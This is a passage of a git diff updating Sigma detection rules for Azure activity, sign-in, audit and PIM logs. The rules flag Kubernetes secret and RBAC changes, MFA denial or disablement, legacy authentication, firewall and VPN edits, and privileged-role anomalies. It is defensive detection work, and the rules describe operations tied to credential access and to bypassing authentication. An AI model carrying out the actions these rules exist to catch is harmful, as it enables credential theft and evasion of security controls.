2021/08/07 +modified: 2022/08/23 +tags: + - attack.impact + - attack.credential_access logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/DELETE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/DELETE condition: selection -level: medium -tags: - - attack.impact - - attack.credential_access falsepositives: - - RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_kubernetes_secret_or_config_object_access.yml b/src/main/resources/rules/azure/azure_kubernetes_secret_or_config_object_access.yml index f809df396..104cb0a32 100644 --- a/src/main/resources/rules/azure/azure_kubernetes_secret_or_config_object_access.yml +++ b/src/main/resources/rules/azure/azure_kubernetes_secret_or_config_object_access.yml @@ -1,28 +1,29 @@ title: Azure Kubernetes Secret or Config Object Access id: 7ee0b4aa-d8d4-4088-b661-20efdf41a04c +status: test description: Identifies when a Kubernetes account access a sensitive objects such as configmaps or secrets. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/07 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 - https://attack.mitre.org/matrices/enterprise/cloud/ +author: Austin Songer @austinsonger +date: 2021/08/07 +modified: 2022/08/23 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/DELETE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/DELETE condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_kubernetes_service_account_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_kubernetes_service_account_modified_or_deleted.yml index 355e7bd31..16c04cc67 100644 --- a/src/main/resources/rules/azure/azure_kubernetes_service_account_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_kubernetes_service_account_modified_or_deleted.yml @@ -1,28 +1,30 @@ title: Azure Kubernetes Service Account Modified or Deleted id: 12d027c3-b48c-4d9d-8bb6-a732200034b2 +status: test description: Identifies when a service account is modified or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/07 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 - https://attack.mitre.org/matrices/enterprise/cloud/ +author: Austin Songer @austinsonger +date: 2021/08/07 +modified: 2022/08/23 +tags: + - attack.impact + - attack.t1531 logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/DELETE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/IMPERSONATE/ACTION condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_legacy_authentication_protocols.yml b/src/main/resources/rules/azure/azure_legacy_authentication_protocols.yml new file mode 100644 index 000000000..735d47762 --- /dev/null +++ b/src/main/resources/rules/azure/azure_legacy_authentication_protocols.yml @@ -0,0 +1,32 @@ +title: Use of Legacy Authentication Protocols +id: 60f6535a-760f-42a9-be3f-c9a0a025906e +status: test +description: Alert on when legacy authentication has been used on an account +references: + - https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts +author: Yochana Henderson, '@Yochana-H' +date: 2022/06/17 +tags: + - attack.initial_access + - attack.credential_access + - attack.t1078.004 + - attack.t1110 +logsource: + product: azure + service: signinlogs +detection: + selection: + ActivityDetails: Sign-ins + ClientApp: + - Other client + - IMAP + - POP3 + - MAPI + - SMTP + - Exchange ActiveSync + - Exchange Web Services + Username: 'UPN' + condition: selection +falsepositives: + - User has been put in acception group so they can use legacy authentication +level: high diff --git a/src/main/resources/rules/azure/azure_login_to_disabled_account.yml b/src/main/resources/rules/azure/azure_login_to_disabled_account.yml index 41c45d939..360dd6745 100644 --- a/src/main/resources/rules/azure/azure_login_to_disabled_account.yml +++ b/src/main/resources/rules/azure/azure_login_to_disabled_account.yml @@ -1,22 +1,23 @@ title: Login to Disabled Account id: 908655e0-25cf-4ae1-b775-1c8ce9cf43d8 -status: experimental -author: AlertIQ -date: 2021/10/10 +status: test description: Detect failed attempts to sign in to disabled accounts. references: - - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +author: AlertIQ +date: 2021/10/10 +modified: 2022/12/25 +tags: + - attack.initial_access + - attack.t1078.004 logsource: - product: azure - service: signinlogs + product: azure + service: signinlogs detection: - selection: - ResultType: 50057 - ResultDescription: 'User account is disabled. The account has been disabled by an administrator.' - condition: selection -level: medium + selection: + ResultType: 50057 + ResultDescription: 'User account is disabled. The account has been disabled by an administrator.' + condition: selection falsepositives: - - Unknown -tags: - - attack.initial_access - - attack.t1078 + - Unknown +level: medium diff --git a/src/main/resources/rules/azure/azure_mfa_denies.yml b/src/main/resources/rules/azure/azure_mfa_denies.yml index f0f63b75e..975236d45 100644 --- a/src/main/resources/rules/azure/azure_mfa_denies.yml +++ b/src/main/resources/rules/azure/azure_mfa_denies.yml @@ -1,22 +1,25 @@ title: Multifactor Authentication Denied id: e40f4962-b02b-4192-9bfe-245f7ece1f99 -status: experimental -author: AlertIQ -date: 2022/03/24 +status: test description: User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account. references: - - https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ + - https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ +author: AlertIQ +date: 2022/03/24 +tags: + - attack.initial_access + - attack.credential_access + - attack.t1078.004 + - attack.t1110 + - attack.t1621 logsource: - product: azure - service: signinlogs + product: azure + service: signinlogs detection: - selection: - AuthenticationRequirement: 'multiFactorAuthentication' - Status|contains: 'MFA Denied' - condition: selection -level: medium + selection: + AuthenticationRequirement: 'multiFactorAuthentication' + Status|contains: 'MFA Denied' + condition: selection falsepositives: - - Users actually login but miss-click into the Deny button when MFA prompt. -tags: - - attack.initial_access - - attack.t1078.004 + - Users actually login but miss-click into the Deny button when MFA prompt. +level: medium diff --git a/src/main/resources/rules/azure/azure_mfa_disabled.yml b/src/main/resources/rules/azure/azure_mfa_disabled.yml index d8ce54bce..378bd6e25 100644 --- a/src/main/resources/rules/azure/azure_mfa_disabled.yml +++ b/src/main/resources/rules/azure/azure_mfa_disabled.yml @@ -1,12 +1,14 @@ title: Disabled MFA to Bypass Authentication Mechanisms id: 7ea78478-a4f9-42a6-9dcd-f861816122bf -status: experimental +status: test description: Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms. -author: '@ionsor' -date: 2022/02/08 references: - - https://attack.mitre.org/techniques/T1556/ - https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates +author: '@ionsor' +date: 2022/02/08 +tags: + - attack.persistence + - attack.t1556 logsource: product: azure service: activitylogs @@ -19,6 +21,3 @@ detection: falsepositives: - Authorized modification by administrators level: medium -tags: - - attack.persistence - - attack.t1556 diff --git a/src/main/resources/rules/azure/azure_mfa_interrupted.yml b/src/main/resources/rules/azure/azure_mfa_interrupted.yml index 5919ea0fe..e6b395aed 100644 --- a/src/main/resources/rules/azure/azure_mfa_interrupted.yml +++ b/src/main/resources/rules/azure/azure_mfa_interrupted.yml @@ -1,25 +1,29 @@ -title: Multifactor Authentication Interupted +title: Multifactor Authentication Interrupted id: 5496ff55-42ec-4369-81cb-00f417029e25 -status: experimental -author: AlertIQ -date: 2021/10/10 +status: test description: Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge. references: - - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +author: AlertIQ +date: 2021/10/10 +modified: 2022/12/18 +tags: + - attack.initial_access + - attack.credential_access + - attack.t1078.004 + - attack.t1110 + - attack.t1621 logsource: - product: azure - service: signinlogs + product: azure + service: signinlogs detection: - selection: - ResultType: 50074 - ResultDescription|contains: 'Strong Auth required' - selection1: - ResultType: 500121 - ResultDescription|contains: 'Authentication failed during strong authentication request' - condition: selection or selection1 -level: medium + selection_50074: + ResultType: 50074 + ResultDescription|contains: 'Strong Auth required' + selection_500121: + ResultType: 500121 + ResultDescription|contains: 'Authentication failed during strong authentication request' + condition: 1 of selection_* falsepositives: - - Unknown -tags: - - attack.initial_access - - attack.t1078.004 + - Unknown +level: medium diff --git a/src/main/resources/rules/azure/azure_network_firewall_policy_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_network_firewall_policy_modified_or_deleted.yml index a679d1892..bb51fbb34 100644 --- a/src/main/resources/rules/azure/azure_network_firewall_policy_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_network_firewall_policy_modified_or_deleted.yml @@ -1,25 +1,28 @@ title: Azure Network Firewall Policy Modified or Deleted id: 83c17918-746e-4bd9-920b-8e098bf88c23 +status: test description: Identifies when a Firewall Policy is Modified or Deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/09/02 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer @austinsonger +date: 2021/09/02 +modified: 2022/08/23 +tags: + - attack.impact + - attack.defense_evasion + - attack.t1562.007 logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.NETWORK/FIREWALLPOLICIES/WRITE - MICROSOFT.NETWORK/FIREWALLPOLICIES/JOIN/ACTION - MICROSOFT.NETWORK/FIREWALLPOLICIES/CERTIFICATES/ACTION - MICROSOFT.NETWORK/FIREWALLPOLICIES/DELETE condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Firewall Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Firewall Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Firewall Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Firewall Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_network_firewall_rule_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_network_firewall_rule_modified_or_deleted.yml index 42ef6878a..e0a1bcb81 100644 --- a/src/main/resources/rules/azure/azure_network_firewall_rule_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_network_firewall_rule_modified_or_deleted.yml @@ -1,25 +1,26 @@ title: Azure Firewall Rule Configuration Modified or Deleted id: 2a7d64cf-81fa-4daf-ab1b-ab80b789c067 +status: test description: Identifies when a Firewall Rule Configuration is Modified or Deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/08 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer @austinsonger +date: 2021/08/08 +modified: 2022/08/23 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/WRITE - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/DELETE - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULEGROUPS/WRITE - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULEGROUPS/DELETE condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Firewall Rule Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Firewall Rule Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Firewall Rule Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Firewall Rule Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_network_p2s_vpn_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_network_p2s_vpn_modified_or_deleted.yml index 16373fbd0..f2e353cc3 100644 --- a/src/main/resources/rules/azure/azure_network_p2s_vpn_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_network_p2s_vpn_modified_or_deleted.yml @@ -1,17 +1,20 @@ title: Azure Point-to-site VPN Modified or Deleted id: d9557b75-267b-4b43-922f-a775e2d1f792 +status: test description: Identifies when a Point-to-site VPN is Modified or Deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/08 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer @austinsonger +date: 2021/08/08 +modified: 2022/08/23 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.NETWORK/P2SVPNGATEWAYS/WRITE - MICROSOFT.NETWORK/P2SVPNGATEWAYS/DELETE - MICROSOFT.NETWORK/P2SVPNGATEWAYS/RESET/ACTION @@ -19,9 +22,7 @@ detection: - MICROSOFT.NETWORK/P2SVPNGATEWAYS/DISCONNECTP2SVPNCONNECTIONS/ACTION - MICROSOFT.NETWORK/P2SVPNGATEWAYS/PROVIDERS/MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/WRITE condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Point-to-site VPN being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Point-to-site VPN modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Point-to-site VPN being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Point-to-site VPN modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_network_security_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_network_security_modified_or_deleted.yml index 395880e92..f256222b5 100644 --- a/src/main/resources/rules/azure/azure_network_security_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_network_security_modified_or_deleted.yml @@ -1,17 +1,20 @@ title: Azure Network Security Configuration Modified or Deleted id: d22b4df4-5a67-4859-a578-8c9a0b5af9df +status: test description: Identifies when a network security configuration is modified or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/08 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer @austinsonger +date: 2021/08/08 +modified: 2022/08/23 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/WRITE - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/DELETE - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/SECURITYRULES/WRITE @@ -19,9 +22,7 @@ detection: - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/JOIN/ACTION - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/PROVIDERS/MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/WRITE condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Network Security Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Network Security Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Network Security Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Network Security Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_network_virtual_device_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_network_virtual_device_modified_or_deleted.yml index 7e8ed5b4a..a79c2bef3 100644 --- a/src/main/resources/rules/azure/azure_network_virtual_device_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_network_virtual_device_modified_or_deleted.yml @@ -1,17 +1,22 @@ title: Azure Virtual Network Device Modified or Deleted id: 15ef3fac-f0f0-4dc4-ada0-660aa72980b3 -description: Identifies when a virtual network device is being modified or deleted. This can be a network interface, network virtual appliance, virtual hub, or virtual router. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/08 +status: test +description: | + Identifies when a virtual network device is being modified or deleted. + This can be a network interface, network virtual appliance, virtual hub, or virtual router. references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer @austinsonger +date: 2021/08/08 +modified: 2022/08/23 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/WRITE - MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/DELETE - MICROSOFT.NETWORK/NETWORKINTERFACES/WRITE @@ -24,9 +29,7 @@ detection: - MICROSOFT.NETWORK/VIRTUALROUTERS/WRITE - MICROSOFT.NETWORK/VIRTUALROUTERS/DELETE condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Virtual Network Device being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Virtual Network Device modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Virtual Network Device being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Virtual Network Device modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_new_cloudshell_created.yml b/src/main/resources/rules/azure/azure_new_cloudshell_created.yml index e06b47f2f..2895634e5 100644 --- a/src/main/resources/rules/azure/azure_new_cloudshell_created.yml +++ b/src/main/resources/rules/azure/azure_new_cloudshell_created.yml @@ -1,21 +1,22 @@ title: Azure New CloudShell Created id: 72af37e2-ec32-47dc-992b-bc288a2708cb +status: test description: Identifies when a new cloudshell is created inside of Azure portal. -author: Austin Songer -status: experimental -date: 2021/09/21 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer +date: 2021/09/21 +modified: 2022/08/23 +tags: + - attack.execution + - attack.t1059 logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: MICROSOFT.PORTAL/CONSOLES/WRITE + operationName: MICROSOFT.PORTAL/CONSOLES/WRITE condition: selection -level: medium -tags: - - attack.execution - - attack.t1059 falsepositives: - - A new cloudshell may be created by a system administrator. + - A new cloudshell may be created by a system administrator. +level: medium diff --git a/src/main/resources/rules/azure/azure_owner_removed_from_application_or_service_principal.yml b/src/main/resources/rules/azure/azure_owner_removed_from_application_or_service_principal.yml index d32b447cf..6dc94f25e 100644 --- a/src/main/resources/rules/azure/azure_owner_removed_from_application_or_service_principal.yml +++ b/src/main/resources/rules/azure/azure_owner_removed_from_application_or_service_principal.yml @@ -1,24 +1,25 @@ title: Azure Owner Removed From Application or Service Principal id: 636e30d5-3736-42ea-96b1-e6e2f8429fd6 +status: test description: Identifies when a owner is was removed from a application or service principal in Azure. -author: Austin Songer @austinsonger -status: experimental -date: 2021/09/03 references: - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy +author: Austin Songer @austinsonger +date: 2021/09/03 +modified: 2022/10/09 +tags: + - attack.defense_evasion logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: properties.message: - Remove owner from service principal - Remove owner from application condition: selection -level: medium -tags: - - attack.defense_evasion falsepositives: - - Owner being removed may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Owner removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Owner being removed may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Owner removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_pim_account_stale.yml b/src/main/resources/rules/azure/azure_pim_account_stale.yml new file mode 100644 index 000000000..f544b80e6 --- /dev/null +++ b/src/main/resources/rules/azure/azure_pim_account_stale.yml @@ -0,0 +1,22 @@ +title: Stale Accounts In A Privileged Role +id: e402c26a-267a-45bd-9615-bd9ceda6da85 +status: experimental +description: Identifies when an account hasn't signed in during the past n number of days. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#potential-stale-accounts-in-a-privileged-role +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/14 +tags: + - attack.t1078 + - attack.persistence + - attack.privilege_escalation +logsource: + product: azure + service: pim +detection: + selection: + riskEventType: 'staleSignInAlertIncident' + condition: selection +falsepositives: + - Investigate if potential generic account that cannot be removed. +level: high diff --git a/src/main/resources/rules/azure/azure_pim_activation_approve_deny.yml b/src/main/resources/rules/azure/azure_pim_activation_approve_deny.yml new file mode 100644 index 000000000..e0cb9afc9 --- /dev/null +++ b/src/main/resources/rules/azure/azure_pim_activation_approve_deny.yml @@ -0,0 +1,21 @@ +title: PIM Approvals And Deny Elevation +id: 039a7469-0296-4450-84c0-f6966b16dc6d +status: test +description: Detects when a PIM elevation is approved or denied. Outside of normal operations should be investigated. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment +author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H' +date: 2022/08/09 +tags: + - attack.privilege_escalation + - attack.t1078.004 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: Request Approved/Denied + condition: selection +falsepositives: + - Actual admin using PIM. +level: high diff --git a/src/main/resources/rules/azure/azure_pim_alerts_disabled.yml b/src/main/resources/rules/azure/azure_pim_alerts_disabled.yml new file mode 100644 index 000000000..bcd081d77 --- /dev/null +++ b/src/main/resources/rules/azure/azure_pim_alerts_disabled.yml @@ -0,0 +1,22 @@ +title: PIM Alert Setting Changes To Disabled +id: aeaef14c-e5bf-4690-a9c8-835caad458bd +status: test +description: Detects when PIM alerts are set to disabled. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment +author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H' +date: 2022/08/09 +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1078 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: Disable PIM Alert + condition: selection +falsepositives: + - Administrator disabling PIM alerts as an active choice. +level: high diff --git a/src/main/resources/rules/azure/azure_pim_change_settings.yml b/src/main/resources/rules/azure/azure_pim_change_settings.yml new file mode 100644 index 000000000..c5ef56275 --- /dev/null +++ b/src/main/resources/rules/azure/azure_pim_change_settings.yml @@ -0,0 +1,22 @@ +title: Changes To PIM Settings +id: db6c06c4-bf3b-421c-aa88-15672b88c743 +status: test +description: Detects when changes are made to PIM roles +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment +author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H' +date: 2022/08/09 +tags: + - attack.privilege_escalation + - attack.persistence + - attack.t1078.004 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: Update role setting in PIM + condition: selection +falsepositives: + - Legit administrative PIM setting configuration changes +level: high diff --git a/src/main/resources/rules/azure/azure_pim_invalid_license.yml b/src/main/resources/rules/azure/azure_pim_invalid_license.yml new file mode 100644 index 000000000..240624f6e --- /dev/null +++ b/src/main/resources/rules/azure/azure_pim_invalid_license.yml @@ -0,0 +1,22 @@ +title: Invalid PIM License +id: 58af08eb-f9e1-43c8-9805-3ad9b0482bd8 +status: experimental +description: Identifies when an organization doesn't have the proper license for PIM and is out of compliance. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#the-organization-doesnt-have-microsoft-entra-premium-p2-or-microsoft-entra-id-governance +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/14 +tags: + - attack.t1078 + - attack.persistence + - attack.privilege_escalation +logsource: + product: azure + service: pim +detection: + selection: + riskEventType: 'invalidLicenseAlertIncident' + condition: selection +falsepositives: + - Investigate if licenses have expired. +level: high diff --git a/src/main/resources/rules/azure/azure_pim_role_assigned_outside_of_pim.yml b/src/main/resources/rules/azure/azure_pim_role_assigned_outside_of_pim.yml new file mode 100644 index 000000000..c36f8d16f --- /dev/null +++ b/src/main/resources/rules/azure/azure_pim_role_assigned_outside_of_pim.yml @@ -0,0 +1,22 @@ +title: Roles Assigned Outside PIM +id: b1bc08d1-8224-4758-a0e6-fbcfc98c73bb +status: experimental +description: Identifies when a privilege role assignment has taken place outside of PIM and may indicate an attack. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-assigned-outside-of-privileged-identity-management +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/14 +tags: + - attack.t1078 + - attack.persistence + - attack.privilege_escalation +logsource: + product: azure + service: pim +detection: + selection: + riskEventType: 'rolesAssignedOutsidePrivilegedIdentityManagementAlertConfiguration' + condition: selection +falsepositives: + - Investigate where users are being assigned privileged roles outside of Privileged Identity Management and prohibit future assignments from there. +level: high diff --git a/src/main/resources/rules/azure/azure_pim_role_frequent_activation.yml b/src/main/resources/rules/azure/azure_pim_role_frequent_activation.yml new file mode 100644 index 000000000..279cae7f0 --- /dev/null +++ b/src/main/resources/rules/azure/azure_pim_role_frequent_activation.yml @@ -0,0 +1,22 @@ +title: Roles Activated Too Frequently +id: 645fd80d-6c07-435b-9e06-7bc1b5656cba +status: experimental +description: Identifies when the same privilege role has multiple activations by the same user. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-activated-too-frequently +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/14 +tags: + - attack.t1078 + - attack.persistence + - attack.privilege_escalation +logsource: + product: azure + service: pim +detection: + selection: + riskEventType: 'sequentialActivationRenewalsAlertIncident' + condition: selection +falsepositives: + - Investigate where if active time period for a role is set too short. +level: high diff --git a/src/main/resources/rules/azure/azure_pim_role_no_mfa_required.yml b/src/main/resources/rules/azure/azure_pim_role_no_mfa_required.yml new file mode 100644 index 000000000..3a0208402 --- /dev/null +++ b/src/main/resources/rules/azure/azure_pim_role_no_mfa_required.yml @@ -0,0 +1,22 @@ +title: Roles Activation Doesn't Require MFA +id: 94a66f46-5b64-46ce-80b2-75dcbe627cc0 +status: experimental +description: Identifies when a privilege role can be activated without performing mfa. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#roles-dont-require-multi-factor-authentication-for-activation +author: Mark Morowczynski 